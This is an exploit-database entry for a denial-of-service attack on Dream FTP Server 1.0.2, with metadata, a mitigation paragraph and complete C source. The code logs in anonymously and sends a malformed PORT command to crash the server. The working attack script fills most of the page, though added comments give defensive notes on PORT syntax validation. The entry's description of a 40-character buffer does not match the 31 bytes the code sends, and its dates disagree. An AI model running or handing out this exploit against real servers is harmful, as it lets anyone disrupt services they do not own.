vendor:
Dream FTP Server
by:
InTeL
7,5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: Dream FTP Server
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:dream_ftp:dream_ftp_server:1.0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2008

DREAM FTP Server 1.0.2 (PORT) Denial of Service Exploit

Dream FTP v1.02 has anonymous logins enabled by default, which enables anyone to crash the server at will. If anonymous logins have been disabled, the crash can still be triggered with another user/pass account. The exploit sends an evil buffer of 40 characters to the server as the argument of the FTP PORT command, which causes the server to crash.

Mitigation:

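Disable anonymous logins and use strong passwords for user accounts. This only narrows who can reach the vulnerable PORT handling: no patch is listed for 1.0.2, so any account that can log in can still crash the server. Restricting network access to the FTP service to trusted hosts, or moving to a maintained FTP server, removes the exposure.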
Source

Exploit-DB raw data:

/*
=============================================================
DREAM FTP Server 1.0.2 (PORT) Denial of Service Exploit
=============================================================
Discovered by: InTeL
*Tested on DREAM FTP v1.02 on Windows XP SP2*

Dream FTP v1.02 also has anonymous logins enabled by default 
which enables anyone to crash the server at will.
But if the anonymous logins have been disabled, try it with 
another user/pass account

Shoutz: bryan@top-notch.ws , Digerati, Erazerz, everyone else u kno who u are
*/

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib,"wsock32.lib")

int usage(char *);


/*
 * Print the tool banner and the expected command line, then terminate
 * the process. Control never returns to the caller, so no value is
 * returned despite the int return type.
 */
int usage(char *filename)
{
	fputs("Dream FTP v1.02 DoS exploit\r\n", stdout);
	fputs("By InTeL\r\n", stdout);
	printf("USAGE: %s <IP_Address> <port>\r\n", filename);

	/* Note: exits with status 0 even though this path means bad arguments. */
	exit(0);
}

/*
 * Proof-of-concept client for the Dream FTP Server 1.0.2 PORT crash
 * described in the file header (tested there against v1.02 on
 * Windows XP SP2).
 *
 * Flow, as visible below:
 *   1. argv[1] is resolved as the host, argv[2] is parsed as the TCP port.
 *   2. A TCP connection is opened and the greeting is read and discarded.
 *   3. A login is attempted with USER Anonymous / PASS Anonymous.
 *   4. One PORT command is sent whose argument is 31 'A' bytes, then the
 *      socket is closed. No reply to the PORT command is read.
 *
 * What a defender can take from this:
 *   - RFC 959 defines the PORT argument as six comma-separated decimal
 *     byte values (h1,h2,h3,h4,p1,p2). The argument sent here contains no
 *     digits or commas at all, so a server, proxy or IDS that validates
 *     PORT syntax before parsing would reject or flag it.
 *   - The request is only sent after a login attempt, which is why the
 *     page ties exposure to the default-enabled anonymous account.
 *
 * Code-quality notes (none of the server replies are ever inspected):
 *   - Return values of recv() and send() are ignored throughout.
 *   - The exit(1) paths after socket() do not close the socket, and
 *     WSACleanup() is never called.
 *   - NOTE(review): `i` is declared in the first for statement and reused
 *     by the later loops; that only builds with compilers that let a
 *     for-init declaration escape into the enclosing scope.
 */
int main(int argc, char *argv[])
{
	/* evilbuf: outgoing command buffer; the longest string built in it is
	 * 38 bytes plus the terminator. recvbuf: scratch space for replies. */
	char evilbuf[40], recvbuf[1028];
	unsigned short port;
	struct sockaddr_in saddr;
	struct hostent *he;
	WSADATA wsaData;
	SOCKET sock;

	/* Exactly two arguments are required; usage() prints help and exits. */
	if(argc != 3)
		usage(argv[0]);

	/* atoi() gives no error indication: non-numeric input yields 0, and the
	 * int result is narrowed to unsigned short without a range check. */
	port = atoi(argv[2]);	
	if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){
		printf("Unable to initialize Winsock \n");
		exit(1);
	}

	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET){
		printf("Socket Error \n");
		exit(1);
	}

	if ((he = gethostbyname(argv[1])) == NULL){  
		printf("Couldnt Resolve %s \n",argv[1]);
		exit(1);
	}

	/* Build the IPv4 destination from the first resolved address. */
	memset(&saddr, 0, sizeof(saddr));
	saddr.sin_family = AF_INET;
	saddr.sin_addr = *((struct in_addr *)he->h_addr);	
	saddr.sin_port = htons(port);

	if (connect(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR){
		printf("Connect Error \n");
      	exit(1);
	}

	/* Drain the greeting: three reads, contents discarded. The fixed count
	 * presumably matches how this server splits its banner -- TODO confirm.
	 * Reading at most 1027 bytes into the zeroed 1028-byte buffer keeps it
	 * NUL-terminated. */
	for(int i = 0; i<3;i++){
		memset(recvbuf, 0, sizeof(recvbuf));
		recv(sock, recvbuf, 1027, 0);
	}
	printf("Logging in\r\n");	

	/* Login step 1: fixed anonymous user name. */
	memset(evilbuf, 0,sizeof(evilbuf));
	strcpy(evilbuf, "USER Anonymous\r\n"); //USER
	send (sock, evilbuf, strlen(evilbuf), 0);
   
	/* Four reads after USER; the reply code is not checked. */
	for(i=0;i<4;i++){
		memset(recvbuf,0,sizeof(recvbuf));
		recv(sock, recvbuf, 1027, 0);
   	}
   
	/* Login step 2: fixed password. Whether the login succeeded is never
	 * verified before continuing. */
	memset(evilbuf, 0, sizeof(evilbuf));
	strcpy(evilbuf, "PASS Anonymous\r\n"); //PASS
	send (sock, evilbuf, strlen(evilbuf), 0);

	/* Three reads after PASS, again discarded. */
	for(i=0; i<3;i++) {
		memset(recvbuf, 0, sizeof(recvbuf));
		recv(sock, recvbuf, 1027, 0);
   	}
	printf("Building overflow string\r\n");

	/* Build "PORT " + 'A' at indexes 5..35 (31 bytes) + "\r\n". The memset
	 * above leaves index 36 as NUL, so strcat appends at the right place and
	 * the result (38 bytes + terminator) fits in the 40-byte buffer. The
	 * argument is not a valid h1,h2,h3,h4,p1,p2 tuple. */
	memset(evilbuf,0,sizeof(evilbuf));
	strcpy(evilbuf, "PORT ");  //PORT 
	for(i = 5;i != 36;i++)
		evilbuf[i] = 'A';
   	strcat(evilbuf,"\r\n");
	
	send (sock, evilbuf, strlen(evilbuf), 0);  
   
	/* Printed unconditionally: nothing here confirms the server's state. */
	printf("DoS Attack Done\r\n");
	closesocket(sock);

	return 0;
}

// milw0rm.com [2006-12-21]